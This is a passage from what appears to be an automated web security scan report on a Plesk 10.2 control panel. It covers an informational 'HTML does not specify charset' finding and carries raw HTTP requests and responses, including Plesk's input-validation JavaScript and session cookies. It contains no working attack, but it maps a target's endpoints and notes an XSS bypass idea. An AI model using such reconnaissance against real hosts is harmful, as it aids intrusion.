<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

12. HTML does not specify charset  previous  next
There are 16 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. http://vulnerable.plesk.control.panel.20110407.20:8880/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /

Request

GET / HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:35 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /javascript/chk.js.php

Request

GET /javascript/chk.js.php?1302230642 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "1306174954-17161f28b87a6960fb097d11330c9c53-en-US"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:34 GMT
Connection: close
Content-Length: 8894

function chk_quotes(str)
{
   re = /(\'.*\")|(\".*\')/;
   return str.search(re) == -1;
}


function chk_pd_name(dir)
{
   re = /^[0-9a-zA-Z\-_.\/~@!\+=\^\(\)\[\]\{\}, ]+$/;
   // forbid // and ^. and /. and .$ and ./
   re1 = /(\/\/|^\.|\.$|\/\.|\.\/|\/ | \/)/;
   return (dir.search(re) != -1) && (dir.search(re1) == -1);
}

function chk_db_name(db)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9-_]{0,63}$/;
   return db.search(re) != -1;
}

function chk_db_usr_name(usr, type)
{
   if (type == 'mssql')
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,127}$/;
   else
       re = /^[a-zA-Z]{1}[A-Za-z0-9_\-]{0,15}$/;
   return usr.search(re) != -1;
}

function chk_pos_int(pos_int)
{
   re = /^\s*[1-9]{1}[0-9]*\s*$/;
   return pos_int.search(re) != -1;
}

function chk_sys_login(nm)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,14}$/;
   return nm.search(re) != -1;
}

function chk_mn(mail_name)
{
   re = /^([A-Za-z0-9_\-])+((\.){1}([A-Za-z0-9_\-])+)*$/;
   return mail_name.search(re) != -1;
}

function chk_resp_name(resp_name)
{
   return ((resp_name.length > 0) && (resp_name.length <= 245));
}

function chk_login(login)
{
   re = /^[a-zA-Z0-9]{1}[A-Za-z0-9_.-]{0,254}$/;
   return login.search(re) != -1;
}

function chk_realm(realm)
{
   re = /^[^\"]*$/;
   return realm.search(re) != -1;
}

function chk_dom(dom_name)
{
   if ('' == dom_name)
       return false; // check empty value

   if ('localhost.rev' == dom_name)
       return false;

   inaddr = /\.in-addr.arpa$/;
   if (dom_name.search(inaddr) != -1)
       return false;

   if (chk_ip(dom_name))    // no domain name like IP address
       return false;

   dotd = /\.d$/;
   if (dom_name.search(dotd) != -1)
       return false;

   return true; // IDN support
   /*
   nore = /\.$/;
   re = /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9]){0,1}){1,}$/;

   return (dom_name.search(nore) == -1) && dom_name.match(re);
   */
}

function chk_subdom(dom_name)
{
   return true; // IDN support
   /*
   re = /^[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*$/;
   return dom_name.search(re) != -1;
   */
}

function chk_email(email)
{
   re = /^([^\@]+){1}\@([^\@]+){1}$/;
   found = email.match(re);
   if (!found)
       return false;
   return chk_mn(found[1]) && chk_dom(found[2]);
}

function chk_url(url)
{
   re = /^((http[s]?|ftp):\/\/)?([^\/:]+)(:\d{1,5})?(\/[^\s\"\'`]*)?$/i;
   found = re.exec(url);
   if (!found)
       return false;

   return chk_dom(found[3]);
}

function chk_ip(ip)
{
   return chk_ip_address_and_mask(ip, 4, 8);
}

function chk_dom_t(hst)
{
re = /^((<domain>|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*)(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])*|\.<domain>)+|<domain>)$/;
return hst.match(re);
}

function chk_ip_t(ip)
{
   re = /^<ip>$/;
   return chk_ip(ip) || ip.match(re);
}

function chk_mask(mask)
{
   re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   found = mask.match(re);
   if (!found)
       return false;
   var i = found.length - 1;
   while (i && (found[i] == 0)) i--;
   if (!i)
       return true;
   if (
       (found[i] != 128) &&
       (found[i] != 192) &&
       (found[i] != 224) &&
       (found[i] != 240) &&
       (found[i] != 248) &&
       (found[i] != 252) &&
       (found[i] != 254) &&
       (found[i] != 255)
   )
       return false;
   i--;
   while (i && (found[i] == 255)) i--;

   return i == 0;
}

function ip2long(str)
{
   var num = 0;
   var re = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   found = str.match(re);
   if (!found)
       return null;
   for (var i = 0; ++i < found.length; ) {
       num <<= 8;
       num |= found[i];
   }
   return num;
}

// convert ip block mask to int32 mask
function block_to_num(block)
{
   num = 0;
   for (var i = 0; i < 32; i++) {
       num <<= 1;
       num |= (block > i ? 1 : 0);
   }
   return num;
}

// check ip address and mask by valid rules
function chk_ip_address_and_mask(ip, valid, valid_formats)
{
   var ip_address_mask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.\*|)|\.\*\.\*|\.\*|)|\.\*\.\*\.\*|\.\*\.\*|\.\*|)()$/;
   var ip_address_block_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,2})$/;
   var ip_address_netmask_format = /^(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})(\.(\d{1,3})|)|)|)\/(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;
   var ip_address_format = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/;

   if (!valid)
       valid = 7;
   if (!valid_formats)
       valid_formats = 15;

   var found;
   var ip_address = null;
   var ip_mask = null;

   if (
       (valid_formats & 1) &&
       (found = ip.match(ip_address_mask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255))
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long((found[1] ? 255 : 0) + '.' + (found[3] ? 255 : 0) + '.' + (found[5] ? 255 : 0) + '.' + (found[7] ? 255 : 0));
   } else if (
       (valid_formats & 2) &&
       (found = ip.match(ip_address_block_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 255)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 32)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = block_to_num(found[8]);
   } else if (
       (valid_formats & 4) &&
       (found = ip.match(ip_address_netmask_format)) &&
       (!found[1] || (found[1] >= 0 && found[1] <= 223)) &&
       (!found[3] || (found[3] >= 0 && found[3] <= 255)) &&
       (!found[5] || (found[5] >= 0 && found[5] <= 255)) &&
       (!found[7] || (found[7] >= 0 && found[7] <= 255)) &&
       (found[8] >= 0 && found[8] <= 255) &&
       (found[9] >= 0 && found[9] <= 255) &&
       (found[10] >= 0 && found[10] <= 255) &&
       (found[11] >= 0 && found[11] <= 255)
   ) {
       ip_address = ip2long((found[1] ? found[1] : 0) + '.' + (found[3] ? found[3] : 0) + '.' + (found[5] ? found[5] : 0) + '.' + (found[7] ? found[7] : 0));
       ip_mask = ip2long(found[8] + '.' + found[9] + '.' + found[10] + '.' + found[11]);
   } else if (
       (valid_formats & 8) &&
       (found = ip.match(ip_address_format)) &&
       (found[1] >= 0 && found[1] <= 255) &&
       (found[2] >= 0 && found[2] <= 255) &&
       (found[3] >= 0 && found[3] <= 255) &&
       (found[4] >= 0 && found[4] <= 255)
   ) {
       ip_address = ip2long(found[1] + '.' + found[2] + '.' + found[3] + '.' + found[4]);
       ip_mask = block_to_num(32);
   }

   if (null == ip_address || null == ip_mask)
       return false;

   return ((valid & 1) && //network block
               ((ip_address & ip_mask) == ip_address)
       ) ||
       ((valid & 2) && // ip address with netmask
           ip_address && ip_mask &&
               (
                   ((ip_address & ~ip_mask) && // and not empty lower bits
                   ~((ip_address & ~ip_mask) | ip_mask) // minimum network size 'may be removed - bcause added single addres networks by client request ...
               ) || (ip_mask == block_to_num(32))
           ) // or single ip address
       ) ||
       ((valid & 4) && //sigle ip address
           ip_address && (ip_mask == block_to_num(32)) // not empty ip address and 0xFFFFFFFF ip mask
       );
}

function chk_ip_mask(ip, mask)
{
   if (!chk_ip(ip) || !chk_mask(mask))
       return false;

   var num_ip;
   var num_mask;

   if ((num_ip = ip2long(ip)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   // check ip/mask combination for interface:
   // 1) mask not null
   // 2) host part not null (num_ip & ~num_mask)
   // 3) host part not all 1 ~((num_ip & ~num_mask) | num_mask)
   return num_mask && (((num_ip & ~num_mask) && ~((num_ip & ~num_mask) | num_mask)) || (mask == '255.255.255.255'));
}

function chk_net_mask(net, mask)
{
   if (!chk_ip(net) || !chk_mask(mask))
       return false;

   var num_net;
   var num_mask;

   if ((num_net = ip2long(net)) == null)
       return false;

   if ((num_mask = ip2long(mask)) == null)
       return false;

   return num_mask && (num_net & num_mask) && ((num_net & num_mask) == num_net);
}

function chk_sys_passwd(username, passwd)
{
   if ((passwd.length < 4) || (passwd.length > 255))
       return false;

   if (passwd.length >= username.length) {
       if (passwd.indexOf(username, 0) != -1)
           return false;
   }

   if ((passwd.indexOf('\'') != -1) || (passwd.indexOf(' ') != -1))
       return false;

   for (var i = passwd.length; i-- > 0;) {
       if (passwd.charCodeAt(i) > 127)
           return false;
   }

   return true;
}

function chk_filename(filename)
{
   re = /^[^\']*$/;
   return filename.search(re) != -1;

}

function chk_uint(uint)
{
   re = /^[0-9]+$/;
   found = uint.match(re);
   if (!found) {
       return false;
   }

   return true;
}

12.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-dir/

Request

POST /plesk/client@2/domain@1/hosting/file-manager/create-dir/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=%2Fhttpdocs%2F
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aTo5OTk5OTk7fQ%3D%3D; locale=en-US; psaContext=dashboard; PLESKSESSID=d92187f07d1a80c8d90db119609cd480
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 1189

-----------------------------265001916915724
Content-Disposition: form-data; name="forgery_protection_token"

ac96ec24fae152c446439f0afde39de7
-----------------------------265001916915724
Content-Disposition: form-data; name="cmd"

new_dir
-----------------------------265001916915724
Content-Disposition: form-data; name="lock"

true
-----------------------------265001916915724
Content-Disposition: form-data; name="previous_page"


-----------------------------265001916915724
Content-Disposition: form-data; name="wizaction"


-----------------------------265001916915724
Content-Disposition: form-data; name="filter"


-----------------------------265001916915724
Content-Disposition: form-data; name="page"

0
-----------------------------265001916915724
Content-Disposition: form-data; name="page_size"

999999
-----------------------------265001916915724
Content-Disposition: form-data; name="sort"

name
-----------------------------265001916915724
Content-Disposition: form-data; name="file"


-----------------------------265001916915724
Content-Disposition: form-data; name="subcmd"


-----------------------------265001916915724--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 22:32:21 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 22:32:20 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/register-domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/register-domain/

Request

GET /plesk/client@2/register-domain/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/add-domain/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 21:12:44 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 21:12:44 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/admin-home/featured-applications/

Request

GET /smb/admin-home/featured-applications/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/admin-home
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:00 GMT
Connection: close
Content-Length: 11211

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.ListContainer({
renderTo: 'applicationItems-content-area-ajax-content',
items: [
new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/norton-box.png","title":"Norton Internet Security","info":"Protect your desktop against viruses and spyware","details":{"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/Persony%2C%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony%2C%20Inc.\/undefined\/undefined\/undefined\/resources\/images\/persony_icon.png","title":"Persony Web Conferencing","info":"Meet and collaborate with customers using web and video conferencing","details":{"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"WordPress","info":"Easily create or maintain a website or blog","details":{"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined\/resources\/images\/pinnacle-icon.png","title":"PinnacleCart","info":"None","details":{"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"Drupal","info":"Publish, manage and organize a wide variety of content on a website","details":{"id":"e407a286ccbef0f9e3f37a17cd34a692","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/drupal.org\/Drupal\/6.16-3\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/drupal.org","name":"Drupal","version":"6.16","release":"3","vendor":"drupal.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":150,"packageId":0,"categories":["Web\/Content management"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/pd6fm_box_mp.jpg","title":"Parallels Desktop for Mac","info":"Seamlessly run Windows applications on your Mac","details":{"id":"54b49ed0c84663fe176ca8a9db6e5d79","guid":"tag:catalog.marketplace.parallels.com,2011-03-14:\/none\/Parallels\/Parallels%20Desktop%20for%20Mac\/6-0\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.interspire.com\/knowledgemanager\/","name":"Parallels Desktop for Mac","version":"6","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/nct.parallels.com\/fulfill\/0285.001","rating":110,"packageId":0,"categories":["Front office\/Productivity"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/domains-bttn-small.jpg","title":"Domain Names","info":"Register a new .COM, .NET or .ORG domain name","details":{"id":"040f2e87416b5a105bd858c3ce3daac4","guid":"tag:catalog.marketplace.parallels.com,2010-10-08:\/none\/Parallels\/Domain%20Names\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/products\/dnn\/domains","name":"Domain Names","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":100,"packageId":0,"categories":["Web\/Tools"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"joomla","info":"Build website and powerful online applications","details":{"id":"4e08193654b81aa9ea38e12d232d2ffe","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/www.joomla.org\/joomla\/1.5.20-2\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.joomla.org\/","name":"joomla","version":"1.5.20","release":"2","vendor":"www.joomla.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":90,"packageId":0,"categories":["Web\/Content management"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/keepit-box.png","title":"Keepit Online Backup","info":"Backup desktop files and documents to the Cloud","details":{"id":"50561804184fcd759d8a74a126d50435","guid":"tag:catalog.marketplace.parallels.com,2009-07-27:\/none\/Keepit\/Keepit%20Online%20Backup\/1-1\/Keepit\/undefined\/undefined\/undefined","appId":"https:\/\/www.keepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":80,"packageId":0,"categories":["Web\/Tools"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/PPAV-icon.png","title":"Parallels Premium Anti-Virus","info":"Protect your customers' mailboxes against worms, Trojans and other viruses","details":{"id":"031f7f49d41447a6effe31bdd0cb6f25","guid":"tag:catalog.marketplace.parallels.com,2010-10-21:\/none\/Parallels\/Parallels%20Premium%20Anti-Virus\/1-1\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/www.parallels.com\/store\/premiumantivirus\/","name":"Parallels Premium Anti-Virus","version":"1","release":"1","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"","rating":70,"packageId":0,"categories":[]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"phpBB","info":"Create a web forum or bulletin board in minutes","details":{"id":"7e226faac0bd8495bd9a86e683d8426e","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1\/www.phpbb.com\/phpBB\/3.0.4-4\/parallels.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.phpbb.com\/phpBB","name":"phpBB","version":"3.0.4","release":"4","vendor":"www.phpbb.com","packager":"parallels.com","isAps":true,"packageUrl":"","rating":60,"packageId":0,"categories":["Web\/Forum"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
